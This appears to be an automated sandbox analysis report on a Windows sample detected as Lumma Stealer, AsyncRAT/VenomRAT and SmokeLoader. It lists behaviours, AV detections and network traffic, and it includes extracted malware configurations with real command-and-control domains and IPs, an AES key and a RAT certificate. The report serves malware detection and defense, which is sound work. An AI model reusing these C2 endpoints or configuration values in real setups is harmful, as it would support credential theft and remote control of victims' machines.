Windows Analysis Report
e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe

Overview

General Information

Sample name: e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe
Analysis ID: 1483387
MD5: eccdca95898d2ecce04660fad1209c1d
SHA1: 3be1d8f6d6a75943c1bf7af821d63a1701618f72
SHA256: 7231b59295966497d4a581249d0fd69dcef5de7981d5b3d09039310ca0b875c2
Tags: exe
Infos:

Detection

LummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Check for Windows Defender sandbox
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
System process connects to network (likely due to code injection or exploit)
Yara detected AsyncRAT
Yara detected Go Injector
Yara detected LummaC Stealer
Yara detected SmokeLoader
Yara detected VenomRAT
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Changes memory attributes in foreign processes to executable or writable
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Connects to a pastebin service (likely for C&C)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Creates a thread in another existing process (thread injection)
Creates autostart registry keys with suspicious names
Deletes itself after installation
Drops VBS files to the startup folder
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious ZIP file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
PE file has a writeable .text section
Powershell drops PE file
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Reads the Security eventlog
Reads the System eventlog
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Connects to several IPs in different countries
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
Name Description Attribution Blogpost URLs Link
AsyncRAT AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat
Name Description Attribution Blogpost URLs Link
SmokeLoader The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
 https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Avira: detected
Antivirus detection for URL or domain
Source: https://callosallsaospz.shop/ly3$ Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/apiple-sto:s Avira URL Cloud: Label: malware
Source: callosallsaospz.shop Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/api5 Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/api- Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/api1 Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/d3 Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop:443/api Avira URL Cloud: Label: malware
Source: https://mussangroup.com/wp-content/images/pic1.jpg Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/ Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/api Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/apidows Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Roaming\adjijwj Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Found malware configuration
Source: 00000003.00000002.1941477566.00000000001A0000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://mzxn.ru/tmp/index.php", "http://100xmargin.com/tmp/index.php", "http://wgdnb4rc.xyz/tmp/index.php", "http://olinsw.ws/tmp/index.php"]}
Source: 00000013.00000002.4121890771.0000000004E40000.00000004.08000000.00040000.00000000.sdmp Malware Configuration Extractor: VenomRAT {"Server": "94.156.79.190,193.222.96.24", "Ports": "4449", "Version": "Venom RAT + HVNC + Stealer + Grabber v6.0.2", "Autorun": "false", "Install_Folder": "%AppData%", "AES_key": "KSXE50q1aBZS6zviv09LVn6h1agzpC0c", "Mutex": "aqswvfsywrpgi", "Certificate": "MIICLzCCAZigAwIBAgIVAMlWIVjWC1nh9ktodokpLXg1Z7jDMA0GCSqGSIb3DQEBDQUAMGAxGDAWBgNVBAMMD1Zlbm9tUkFUIFNlcnZlcjEOMAwGA1UECwwFVmVub20xGjAYBgNVBAoMEVZlbm9tUkFUIEJ5IFZlbm9tMQswCQYDVQQHDAJTSDELMAkGA1UEBhMCQ04wHhcNMjIwNDIzMDE0ODMzWhcNMzMwMTMwMDE0ODMzWjATMREwDwYDVQQDDAhWZW5vbVJBVDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEApVFyhBoFr/9yziPYmAfupGi+6Dr9HlSEu4y7EX9UWIylw9CS4Voa/+1ncAOzogfrktnFzQ8mi0CRy5KZ/h/xY3W/RZXSOuTiBxwuYJ21ZyP0F3NE0Dk0iKJbBQvE/zmGVU3o0nSQEJ5eKQF9cj8SCsEac4tcpOeJWGRR4EOaNH8CAwEAAaMyMDAwHQYDVR0OBBYEFAXo7kHUsbMm0Un9lzKiyH3ZKuRhMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADgYEAToihy3/hoIiQqRgL8LQs+1ZyJfdHwOCmbsgIXHWfuygpkNuCVgWyx00+6WG1rrFOf0JZMar0D7txlc/bnAasiYPUL5EXEL/uikR3e8zzcQOhRAszKHobjW3VxGBYxClWdkhDZNxoiXTPs53aoby1ddub4dbDXQzIo//fNN30FNc=", "ServerSignature": "WlDXsoQjOeItY/AjpYunYYPwdj7pVZk3AxP9TSMhaMXlTxtOfd/QUD9Td9tdZ/gqN8Mrd7dFRlgi6WvGULUn8oYyaqUlD8bhcaHBCb7iJvzMqGTkJovPSDs+PdIfDJwTAVY/j6J2UDT7B9Hux+AFROKdJXYBG233NvPZNBdQ8Yc=", "BDOS": "null"}
Source: 00000013.00000002.4121890771.0000000004E40000.00000004.08000000.00040000.00000000.sdmp Malware Configuration Extractor: AsyncRAT {"Server": "94.156.79.190,193.222.96.24", "Ports": "4449", "Version": "Venom RAT + HVNC + Stealer + Grabber v6.0.2", "Autorun": "false", "Install_Folder": "%AppData%", "AES_key": "KSXE50q1aBZS6zviv09LVn6h1agzpC0c", "Mutex": "aqswvfsywrpgi", "Certificate": "MIICLzCCAZigAwIBAgIVAMlWIVjWC1nh9ktodokpLXg1Z7jDMA0GCSqGSIb3DQEBDQUAMGAxGDAWBgNVBAMMD1Zlbm9tUkFUIFNlcnZlcjEOMAwGA1UECwwFVmVub20xGjAYBgNVBAoMEVZlbm9tUkFUIEJ5IFZlbm9tMQswCQYDVQQHDAJTSDELMAkGA1UEBhMCQ04wHhcNMjIwNDIzMDE0ODMzWhcNMzMwMTMwMDE0ODMzWjATMREwDwYDVQQDDAhWZW5vbVJBVDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEApVFyhBoFr/9yziPYmAfupGi+6Dr9HlSEu4y7EX9UWIylw9CS4Voa/+1ncAOzogfrktnFzQ8mi0CRy5KZ/h/xY3W/RZXSOuTiBxwuYJ21ZyP0F3NE0Dk0iKJbBQvE/zmGVU3o0nSQEJ5eKQF9cj8SCsEac4tcpOeJWGRR4EOaNH8CAwEAAaMyMDAwHQYDVR0OBBYEFAXo7kHUsbMm0Un9lzKiyH3ZKuRhMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADgYEAToihy3/hoIiQqRgL8LQs+1ZyJfdHwOCmbsgIXHWfuygpkNuCVgWyx00+6WG1rrFOf0JZMar0D7txlc/bnAasiYPUL5EXEL/uikR3e8zzcQOhRAszKHobjW3VxGBYxClWdkhDZNxoiXTPs53aoby1ddub4dbDXQzIo//fNN30FNc=", "ServerSignature": "WlDXsoQjOeItY/AjpYunYYPwdj7pVZk3AxP9TSMhaMXlTxtOfd/QUD9Td9tdZ/gqN8Mrd7dFRlgi6WvGULUn8oYyaqUlD8bhcaHBCb7iJvzMqGTkJovPSDs+PdIfDJwTAVY/j6J2UDT7B9Hux+AFROKdJXYBG233NvPZNBdQ8Yc=", "BDOS": "null", "External_config_on_Pastebin": "false"}
Source: EF14.exe.3868.9.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop", "indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop", "indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop", "indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop", "indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop"], "Build id": "pointer--"}
Multi AV Scanner detection for domain / URL
Source: liernessfornicsa.shop Virustotal: Detection: 19% Perma Link
Source: mussangroup.com Virustotal: Detection: 13% Perma Link
Source: callosallsaospz.shop Virustotal: Detection: 19% Perma Link
Source: callosallsaospz.shop Virustotal: Detection: 19% Perma Link
Source: https://callosallsaospz.shop/api1 Virustotal: Detection: 15% Perma Link
Source: liernessfornicsa.shop Virustotal: Detection: 19% Perma Link
Source: https://callosallsaospz.shop/api- Virustotal: Detection: 14% Perma Link
Source: https://liernessfornicsa.shop/api_ Virustotal: Detection: 15% Perma Link
Source: shepherdlyopzc.shop Virustotal: Detection: 19% Perma Link
Source: upknittsoappz.shop Virustotal: Detection: 19% Perma Link
Source: https://callosallsaospz.shop:443/api Virustotal: Detection: 22% Perma Link
Source: https://mussangroup.com/wp-content/images/pic1.jpg Virustotal: Detection: 6% Perma Link
Source: https://liernessfornicsa.shop/N Virustotal: Detection: 15% Perma Link
Source: unseaffarignsk.shop Virustotal: Detection: 22% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Temp\EF14.exe ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\g2m.dll ReversingLabs: Detection: 41%
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\g2m.dll ReversingLabs: Detection: 41%
Multi AV Scanner detection for submitted file
Source: e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Virustotal: Detection: 58% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\adjijwj Joe Sandbox ML: detected
Machine Learning detection for sample
Source: e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_03067A10 CryptUnprotectData, 16_2_03067A10
Source: 8EC7.exe, 00000007.00000003.2363296649.000002E4A1111000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_ab5431ce-4
Uses 32bit PE files
Source: e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:62336 version: TLS 1.0
Source: unknown HTTPS traffic detected: 185.149.100.242:443 -> 192.168.2.4:62252 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62253 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62254 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62255 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62258 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.0.235.84:443 -> 192.168.2.4:62260 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62261 version: TLS 1.2
Source: unknown HTTPS traffic detected: 192.168.2.4:62261 -> 107.173.160.137:443 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62266 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62270 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.2.16:443 -> 192.168.2.4:62275 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62274 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:62277 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62278 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:62280 version: TLS 1.2
Source: unknown HTTPS traffic detected: 31.14.70.245:443 -> 192.168.2.4:62279 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62281 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:62283 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62284 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:62285 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62286 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:62287 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62288 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:62289 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62291 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:62290 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:62292 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62294 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:62295 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:62296 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62297 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:62298 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:62299 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62300 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62301 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:62302 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62303 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62304 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62305 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:62306 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62307 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62308 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62309 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:62311 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62312 version: TLS 1.2
Source: unknown HTTPS traffic detected: 192.168.2.4:62312 -> 167.235.128.153:443 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:62315 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62316 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:62317 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62318 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62321 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62322 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62322 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62324 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62326 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62329 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62332 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62335 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62337 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62339 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62340 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62341 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62343 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62344 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62345 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62346 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62348 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62349 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62350 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62351 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62352 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62354 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62355 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62356 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62358 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62359 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62360 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62362 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62363 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62364 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62365 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62367 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62368 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62369 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62370 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62371 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62374 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62375 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62376 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62377 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62378 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62380 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62381 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62382 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62383 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62384 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62386 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62387 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62388 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62390 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62392 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62393 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62394 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62395 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62396 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62398 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62399 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62400 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62401 version: TLS 1.2
Source: Binary string: System.Xml.ni.pdb source: WER250C.tmp.dmp.29.dr
Source: Binary string: rust_dave_sideload.pdb source: vm.exe, 00000013.00000002.4123601062.000000006C8F8000.00000002.00000001.01000000.00000015.sdmp, lm.exe, 00000014.00000002.3069655853.000000006C888000.00000002.00000001.01000000.00000016.sdmp, vm.exe, 0000001A.00000002.3227475624.000000006C8F8000.00000002.00000001.01000000.00000015.sdmp, g2m.dll0.14.dr
Source: Binary string: System.ni.pdbRSDS source: WER250C.tmp.dmp.29.dr
Source: Binary string: BitLockerToGo.pdb source: EF14.exe, 00000009.00000003.2540291593.000001FBFFEF0000.00000004.00001000.00020000.00000000.sdmp, EF14.exe, 00000009.00000002.2561692230.000000C000800000.00000004.00001000.00020000.00000000.sdmp, EF14.exe, 00000009.00000003.2540539671.000001FBFFEB0000.00000004.00001000.00020000.00000000.sdmp, EF14.exe, 00000009.00000002.2560742888.000000C000400000.00000004.00001000.00020000.00000000.sdmp, EF14.exe, 00000009.00000002.2561692230.000000C0008E6000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\p4builds\Products\GoToMeeting\v5.4_builds\output\G2M_Exe.pdb& source: powershell.exe, 0000000E.00000002.2659328365.000001B9B9DB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2659328365.000001B9B9E90000.00000004.00000800.00020000.00000000.sdmp
